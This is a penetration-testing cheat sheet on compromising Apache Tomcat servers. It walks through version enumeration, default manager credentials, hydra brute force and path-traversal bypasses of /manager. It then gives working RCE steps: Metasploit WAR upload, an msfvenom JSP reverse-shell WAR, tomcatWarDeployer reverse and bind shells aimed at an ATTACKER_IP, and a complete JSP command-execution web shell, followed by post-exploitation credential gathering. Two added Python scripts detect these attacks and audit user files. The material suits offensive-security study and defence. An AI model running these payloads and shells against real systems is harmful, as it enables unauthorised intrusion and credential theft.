Tomcat

Discovery

  • Usually runs on port 8080

  • Its characteristic Tomcat error page

Enumeration

Version Identification

To find the Apache Tomcat version, a simple command can be executed:

curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat

This searches for the word "Tomcat" in the documentation index page, which reveals the version in the title tag of the HTML response.

Manager Files Location

Identifying the exact locations of the /manager and /host-manager directories is important because their names may have been changed. A brute-force search for these pages is recommended.

Username Enumeration

For Tomcat versions older than 6, it is possible to enumerate usernames with:

msf> use auxiliary/scanner/http/tomcat_enum

Default Credentials

The /manager/html directory is particularly sensitive because it allows WAR files to be uploaded and deployed, which can lead to code execution. This directory is protected by HTTP basic authentication, and the usual credentials are:

  • admin:admin

  • tomcat:tomcat

  • admin:

  • admin:s3cr3t

  • tomcat:s3cr3t

  • admin:tomcat

These credentials can be tested with:

msf> use auxiliary/scanner/http/tomcat_mgr_login

Another notable directory is /manager/status, which displays the Tomcat and OS version, aiding in vulnerability identification.

Brute Force Attack

To attempt a brute force attack against the manager directory, one can use:

hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html

The same can be done with the Metasploit module above by setting its options to point at the specific host.

Common Vulnerabilities

Password Backtrace Disclosure

Accessing /auth.jsp may disclose the password in a backtrace under favourable conditions.

Double URL Encoding

Exploitation of CVE-2007-1860 in mod_jk allows double URL-encoding path traversal, enabling unauthorized access to the management interface through a specially crafted URL.

To reach the Tomcat management web interface, go to: pathTomcat/%252E%252E/manager/html

/examples

Apache Tomcat versions 4.x to 7.x ship with example scripts that can be affected by information disclosure and cross-site scripting (XSS). These scripts, listed exhaustively below, should be checked for unauthorized access and potential abuse. Find more information here

  • /examples/jsp/num/numguess.jsp

  • /examples/jsp/dates/date.jsp

  • /examples/jsp/snp/snoop.jsp

  • /examples/jsp/error/error.html

  • /examples/jsp/sessions/carts.html

  • /examples/jsp/checkbox/check.html

  • /examples/jsp/colors/colors.html

  • /examples/jsp/cal/login.html

  • /examples/jsp/include/include.jsp

  • /examples/jsp/forward/forward.jsp

  • /examples/jsp/plugin/plugin.jsp

  • /examples/jsp/jsptoserv/jsptoservlet.jsp

  • /examples/jsp/simpletag/foo.jsp

  • /examples/jsp/mail/sendmail.jsp

  • /examples/servlet/HelloWorldExample

  • /examples/servlet/RequestInfoExample

  • /examples/servlet/RequestHeaderExample

  • /examples/servlet/RequestParamExample

  • /examples/servlet/CookieExample

  • /examples/servlet/JndiServlet

  • /examples/servlet/SessionExample

  • /tomcat-docs/appdev/sample/web/hello.jsp

Path Traversal Exploit

In vulnerable Tomcat configurations you can gain access to protected directories in Tomcat using the path: /..;/

So, for example, you might be able to reach the Tomcat manager page by accessing: www.vulnerable.com/lalala/..;/manager/html

Another way to bypass protected paths with this trick is to access http://www.vulnerable.com/;param=value/manager/html
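Added example (not from the original page): a small detector, from the defender's side, that runs over constructed Tomcat access-log lines and flags the path-parameter (`..;/`, `;param=value/`) and double-encoded (`%252E%252E`) bypasses described above, as well as repeated 401s against the manager followed by a 200, which is what the credential brute force described earlier looks like in the logs. The log format, sample addresses and the threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines in the default AccessLogValve "common" pattern (not real traffic)
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /docs/ HTTP/1.1" 200 7000
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /lalala/..;/manager/html HTTP/1.1" 401 2473
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /;param=value/manager/html HTTP/1.1" 401 2473
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /app/%252E%252E/manager/html HTTP/1.1" 404 0
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.7 - - [01/Jan/2024:10:00:07 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.7 - - [01/Jan/2024:10:00:08 +0000] "GET /manager/html HTTP/1.1" 200 12000
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')
PROTECTED = ("/manager/", "/host-manager/")
BRUTE_THRESHOLD = 3  # assumed: 401s from one IP on the manager before we call it brute force

def normalize(path):
    """Undo the tricks from the page: drop ';...' path parameters from every
    segment, then URL-decode until stable so %252E%252E becomes '..'."""
    stripped = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    prev = None
    while prev != stripped:
        prev, stripped = stripped, unquote(stripped)
    return stripped

def analyze(log_text):
    """Return (finding, ip, detail) tuples for every suspicious pattern."""
    findings, failures = [], Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _method, raw_path, status = m.groups()
        norm = normalize(raw_path)
        hits_protected = any(p in norm for p in PROTECTED)
        # a request that only reaches /manager after stripping ';' or decoding is a bypass attempt
        if ".." in norm or (";" in raw_path and hits_protected):
            findings.append(("traversal_bypass", ip, raw_path))
        if hits_protected and status == "401":
            failures[ip] += 1
        elif hits_protected and status == "200" and failures[ip] >= BRUTE_THRESHOLD:
            findings.append(("bruteforce_success", ip, raw_path))
    for ip, n in failures.items():
        if n >= BRUTE_THRESHOLD:
            findings.append(("bruteforce_attempts", ip, str(n)))
    return findings
```

Tomcat only writes these lines if an AccessLogValve is enabled in server.xml, so check that logging is on before relying on this.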

RCE

Finally, if you have access to the Tomcat Web Application Manager, you can upload and deploy a .war file (and so execute code).

Limitations

You will only be able to deploy a WAR if you have sufficient privileges (roles: admin, manager and manager-script). Those details can be found in tomcat-users.xml, usually located at /usr/share/tomcat9/etc/tomcat-users.xml (the path depends on the version) (see the POST section).
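Added example (not from the original page): an audit of a constructed tomcat-users.xml that flags the default credential pairs listed earlier on this page and reports which accounts hold a role that allows WAR deployment. Besides the legacy role names the page mentions, it also treats manager-gui (/manager/html) and manager-script (/manager/text) of current Tomcat releases as deploy-capable; the sample users and the 12-character threshold are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed tomcat-users.xml for the demo; the weak entries are deliberate
SAMPLE_TOMCAT_USERS = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cr3t" roles="manager-gui,manager-script"/>
  <user username="ops" password="tomcat1" roles="manager-script"/>
  <user username="deployer" password="Long-Unique-Passphrase-For-CI-2024" roles="manager-script"/>
  <user username="viewer" password="Status-Only-Passphrase-2024" roles="manager-status"/>
</tomcat-users>
"""

# The default pairs listed on this page ("admin:" is admin with an empty password)
DEFAULT_CREDS = {("admin", "admin"), ("tomcat", "tomcat"), ("admin", ""),
                 ("admin", "s3cr3t"), ("tomcat", "s3cr3t"), ("admin", "tomcat")}
# Roles that can deploy a WAR through the manager application
DEPLOY_ROLES = {"admin", "manager", "manager-gui", "manager-script"}
MIN_PASSWORD_LEN = 12  # assumed local policy; only length is judged, hashed values are not recognised

def audit_tomcat_users(xml_text):
    """Return (severity, username, message) tuples for risky entries, in file order."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if el.tag.split("}")[-1] != "user":      # tolerate the xmlns prefix on tag names
            continue
        name, pw = el.get("username", ""), el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        deploy = sorted(roles & DEPLOY_ROLES)
        if (name, pw) in DEFAULT_CREDS:
            findings.append(("critical" if deploy else "high", name,
                             "default credential pair from public wordlists"))
        elif deploy and len(pw) < MIN_PASSWORD_LEN:
            findings.append(("high", name, "short password on a deploy-capable account"))
        if deploy:
            findings.append(("info", name,
                             "can deploy WARs via /manager (roles: %s)" % ",".join(deploy)))
    return findings

if __name__ == "__main__":
    for severity, user, msg in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print("%-8s %-10s %s" % (severity, user, msg))
```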

# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed

# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"

# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"

Metasploit

use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit

MSFVenom Reverse Shell

  1. Generate the WAR to deploy:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war

  2. Upload the revshell.war file and access it (/revshell/):

Bind and reverse shell with tomcatWarDeployer.py

In some scenarios this does not work (for example with old Sun versions).

Download

git clone https://github.com/mgeeky/tomcatWarDeployer.git

Reverse shell

./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/

Bind shell

./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/

Using Clusterd

clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows

Manual method - Web shell

Create index.jsp with this content:

<FORM METHOD=GET ACTION='index.jsp'>
  <INPUT name='cmd' type=text>
  <INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
  String cmd = request.getParameter("cmd");
  String output = "";
  if(cmd != null) {
    String s = null;
    try {
      Process p = Runtime.getRuntime().exec(cmd,null,null);
      BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
      while((s = sI.readLine()) != null) { output += s+"</br>"; }
    } catch(IOException e) { e.printStackTrace(); }
  }
%>
<pre><%=output %></pre>

Then package it into a WAR:

mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
# webshell.war is created
# Upload it

You could also install this (it allows uploading, downloading and command execution): http://vonloesch.de/filebrowser.html

Manual Method 2

Get a JSP web shell such as this one and create a WAR file:

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp

POST

The Tomcat credentials file is named tomcat-users.xml

find / -name tomcat-users.xml 2>/dev/null

Other ways to gather Tomcat credentials:

msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat

Other Tomcat scanning tools
